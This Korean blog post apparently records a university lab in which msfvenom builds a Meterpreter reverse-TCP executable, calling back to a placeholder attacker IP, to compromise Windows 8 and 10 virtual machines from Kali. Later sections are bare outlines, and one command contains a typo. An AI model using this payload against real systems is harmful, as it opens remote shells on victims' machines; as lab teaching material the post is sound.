728x90
λ°˜μ‘ν˜•

! 이 포슀트의 λ‚΄μš©μ€ 전곡 κ°•μ˜μ—μ„œ 닀룬 λ¦¬λˆ…μŠ€ λ³΄μ•ˆ μ‹€μŠ΅μ˜ 기둝용이며, μ΄λŠ” ν•™μŠ΅ λͺ©μ μœΌλ‘œλ§Œ μ‚¬μš©λ˜μ–΄μ•Ό ν•©λ‹ˆλ‹€.

! μ–΄λ– ν•œ κ²½μš°μ—λ„ μ΄λŸ¬ν•œ κΈ°μˆ μ„ μ•…μš©ν•˜κ±°λ‚˜ λΆˆλ²•μ μΈ ν™œλ™μ— μ‚¬μš©ν•΄μ„œλŠ” μ•ˆ λ©λ‹ˆλ‹€.

 

! λͺ¨μ˜ ν•΄ν‚Ήκ³Ό κ΄€λ ¨λœ μ‹€μŠ΅μ€ 합법적인 ν™˜κ²½μ—μ„œλ§Œ μˆ˜ν–‰λ˜μ–΄μ•Ό ν•˜λ©°, λ¬΄λ‹¨μœΌλ‘œ λ‹€λ₯Έ μ‚¬λžŒμ˜ μ‹œμŠ€ν…œμ— μ ‘κ·Όν•˜λŠ” λ“±μ˜ ν–‰μœ„λŠ” 법적인 문제둜 μ΄μ–΄μ§ˆ 수 μžˆμŠ΅λ‹ˆλ‹€. μ΄λŸ¬ν•œ κΈ°μˆ μ„ μ‚¬μš©ν•  λ•Œμ—λŠ” 항상 윀리적인 μ±…μž„μ„ κ°–κ³  행동해야 ν•©λ‹ˆλ‹€.

 

 

 

πŸ“ μ‹€μŠ΅ μ „ μš©μ–΄ 정리 

  · Reverse TCP

   - (μ—°κ²° μ‹œμž‘ 주체) 곡격 λŒ€μƒ μ‹œμŠ€ν…œμ΄ 연결을 μ‹œμž‘

   - (μ—°κ²° λ°©ν–₯) κ³΅κ²©μžλŠ” Meterpreterλ₯Ό μ‹€ν–‰ν•˜λŠ” λ™μ•ˆ μžμ‹ μ˜ μ‹œμŠ€ν…œμ—μ„œ 연결을 λŒ€κΈ°

 

  · Bind TCP

   - (μ—°κ²° μ‹œμž‘ 주체) κ³΅κ²©μžκ°€ 연결을 μ‹œμž‘

   - (μ—°κ²° λ°©ν–₯) 곡격자의 μ‹œμŠ€ν…œμ—μ„œ 곡격 λŒ€μƒ μ‹œμŠ€ν…œμœΌλ‘œμ˜ μ—°κ²°

 

  •  μ‹€μŠ΅ ν™˜κ²½
    • (가상 ν™˜κ²½ VMware Workstation
    • (곡격자 PC) Kali Linux
    • (곡격 λŒ€μƒ PC) Windows 8

01. reverse μ•…μ„±μ½”λ“œλ₯Ό μ‚¬μš©ν•œ windows 8 ν•΄ν‚Ή

  01-01. 곡격자 PC ν™˜κ²½μ„€μ •

  01-02. msfvenom λͺ…λ Ήμ–΄λ‘œ μ•…μ„±μ½”λ“œ 파일 생성

    - reverse μ•…μ„±μ½”λ“œ 파일 생성

~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[곡격자 IP] -f exe -o [파일 이름.exe]

 

  * 이 λͺ…령은 Meterpreterλ₯Ό μ‚¬μš©ν•˜μ—¬  Windows μ‹œμŠ€ν…œμ˜ 64λΉ„νŠΈ μ•„ν‚€ν…μ²˜λ₯Ό λŒ€μƒμœΌλ‘œ ν•˜λŠ” reverse TCP 연결을 μ„€μ •ν•˜λŠ” νŽ˜μ΄λ‘œλ“œλ₯Ό μƒμ„±ν•˜κ³ , ν•΄λ‹Ή νŽ˜μ΄λ‘œλ“œλ₯Ό μ‹€ν–‰ κ°€λŠ₯ν•œ 파일둜 μ €μž₯ν•œλ‹€. 이 νŒŒμΌμ€ κ³΅κ²©μžκ°€ μ„€μ •ν•œ LHOST(곡격자 IP)λ‘œλΆ€ν„° Meterpreter 셸에 μ ‘κ·Όν•˜κΈ° μœ„ν•΄ μ‚¬μš©λ  수 μžˆλ‹€.

 

  λͺ…λ Ήμ–΄ 각 μ˜΅μ…˜μ˜ 역할은 λ‹€μŒκ³Ό κ°™λ‹€.

 

  ' -p windows/x64/meterpreter/reverse_tcp '

    - 이 μ˜΅μ…˜μ€ μƒμ„±ν•˜λ ¨λŠ” νŽ˜μ΄λ‘œλ“œμ˜ μœ ν˜•μ„ 지정

    - μ—¬κΈ°μ„œλŠ” Meterprter 셸을 μ‚¬μš©ν•˜μ—¬ Windows μ‹œμŠ€ν…œμ— λŒ€ν•œ reverse TCP 연결을 μ„€μ •ν•˜λŠ” νŽ˜μ΄λ‘œλ“œλ₯Ό μƒμ„±ν•˜λ €λŠ” κ²ƒμž„

  ' LHOST=[곡격자  IP] '

    - 이 μ˜΅μ…˜μ€ κ³΅κ²©μžκ°€ 연결을 κΈ°λ‹€λ¦¬λŠ” IP μ£Όμ†Œλ₯Ό 지정

    - μ—¬κΈ°μ„œλŠ” Meterpreterκ°€ μ—°κ²°λ˜κΈ° μœ„ν•΄ 곡격 λŒ€μƒ μ‹œμŠ€ν…œμ΄ μ—°κ²°ν•΄μ•Ό ν•˜λŠ” IP μ£Όμ†Œ, 즉 곡격자 IP μ£Όμ†Œλ₯Ό μ œκ³΅ν•΄μ•Ό 함

  ' -f exe '

    - 이 μ˜΅μ…˜μ€ μƒμ„±λœ 파일의 ν˜•μ‹μ„ 지정

    - μ—¬κΈ°μ„œλŠ” μ‹€ν–‰κ°€λŠ₯ν•œ Windows μ‘μš© ν”„λ‘œκ·Έλž¨(.exe)파일 ν˜•μ‹μ„ 선택함

  ' -o [파일 이름.exe] '

    - 이 μ˜΅μ…˜μ€ μƒμ„±λœ νŽ˜μ΄λ‘œλ“œ 파일의 이름과 경둜λ₯Ό 지정

 

~# dpkg --add-archit3cture i386
~# apt-get update
~# apt-get install wine32

 

  * 이 λͺ…령은 Linux μ‹œμŠ€ν…œμ—μ„œ Wine을 μ„€μΉ˜ν•˜κΈ° μœ„ν•œ 단계이닀. Wine은 Linux 및 λ‹€λ₯Έ μœ λ‹‰μŠ€ 계열 운영 μ²΄μ œμ—μ„œ Windows μ‘μš© ν”„λ‘œκ·Έλž¨μ„ μ‹€ν–‰ν•  수 μžˆγ„±λ° ν•΄μ£ΌλŠ” ν˜Έν™˜μ„± 계측이닀. 

 

  μ•„λž˜λŠ” 각 λͺ…λ Ήμ–΄μ˜ μ„€λͺ…이닀.

 

  ' dpkg --add-architecture i386 '

    - 이 λͺ…λ Ήμ–΄λŠ” μ‹œμŠ€ν…œ μ•„ν‚€ν…μ²˜μ— i386 μ•„ν‚€ν…μ²˜λ₯Ό μΆ”κ°€

    - 이것은 32 λΉ„νŠΈ μ‘μš© ν”„λ‘œκ·Έλž¨μ„ μ‹€ν–‰ν•˜κΈ° μœ„ν•΄ ν•„μš”ν•œ 32 λΉ„νŠΈ 라이브러리λ₯Ό μ„€μΉ˜ν•˜λŠ” 데 도움이 됨

    

  ' apt-get update '

    - νŒ¨ν‚€μ§€ μ—…λ°μ΄νŠΈ

 

  ' apt-get install wine32 '

    - Wine의 32 λΉ„νŠΈ 버전 μ„€μΉ˜

    - μœ„μ—μ„œ μΆ”κ°€ν•œ i386 μ•„ν‚€ν…μ²˜λ₯Ό 기반으둜 Wine을 μ„€μΉ˜ν•˜κΈ° λ•Œλ¬Έμ— 32λΉ„νŠΈ Windows μ‘μš© ν”„λ‘œκ·Έλž¨μ„ μ‹€ν–‰ν•  수 있게 함

 

 

 

02. reverse μ•…μ„±μ½”λ“œλ₯Ό μ‚¬μš©ν•œ windows 10 ν•΄ν‚Ή

  02-01. 곡격 λŒ€μƒ PC ν™˜κ²½μ„€μ •

    - μœˆλ„μš° 10 λ°©ν™”λ²½ λͺ¨λ‘ 끄기

  02-02. msfvenom λͺ…λ Ήμ–΄λ‘œ μ•…μ„±μ½”λ“œ 파일 생성

    - 01-02와 λ™μΌν•œ λ°©μ‹μœΌλ‘œ μ•…μ„±μ½”λ“œ 생성

  02-03. Metasploit μ‚¬μš©ν•˜μ—¬ reverse 곡격 λͺ…λ Ήμ–΄ μ‹€ν–‰

    - 01-02와 λ™μΌν•œ λ°©μ‹μœΌλ‘œ μ•…μ„±μ½”λ“œ 생성

  02-04. Windowsμ—μ„œ μ•…μ„±μ½”λ“œ 파일 μ‹€ν–‰ ν›„ 곡격 μˆ˜ν–‰

    - 01-02와 λ™μΌν•œ λ°©μ‹μœΌλ‘œ μ•…μ„±μ½”λ“œ 생성

 

728x90
λ°˜μ‘ν˜•

'🚨 λ³΄μ•ˆ 싀무 > λͺ¨μ˜ ν•΄ν‚Ή' μΉ΄ν…Œκ³ λ¦¬μ˜ λ‹€λ₯Έ κΈ€

[λͺ¨μ˜ν•΄ν‚Ή] μœ λ‹‰μŠ€/λ¦¬λˆ…μŠ€ 기반의 운영체제 침투  (0) 2025.02.06
[λͺ¨μ˜ ν•΄ν‚Ή] Metasploitable을 μ΄μš©ν•œ 무차별 λŒ€μž… 곡격  (0) 2024.06.03
[λͺ¨μ˜ ν•΄ν‚Ή] 버퍼 μ˜€λ²„ν”Œλ‘œμš° 곡격 μ‹€μŠ΅  (0) 2024.06.03
[λͺ¨μ˜ ν•΄ν‚Ή] μœˆλ„μš°8 μž¬λΆ€νŒ… μ‹œ μ•…μ„±μ½”λ“œ μ‹€ν–‰  (0) 2024.03.05
[λͺ¨μ˜ ν•΄ν‚Ή] μœˆλ„μš°7 OS 침투 μž‘μ—…  (1) 2024.03.05

ν‹°μŠ€ν† λ¦¬νˆ΄λ°”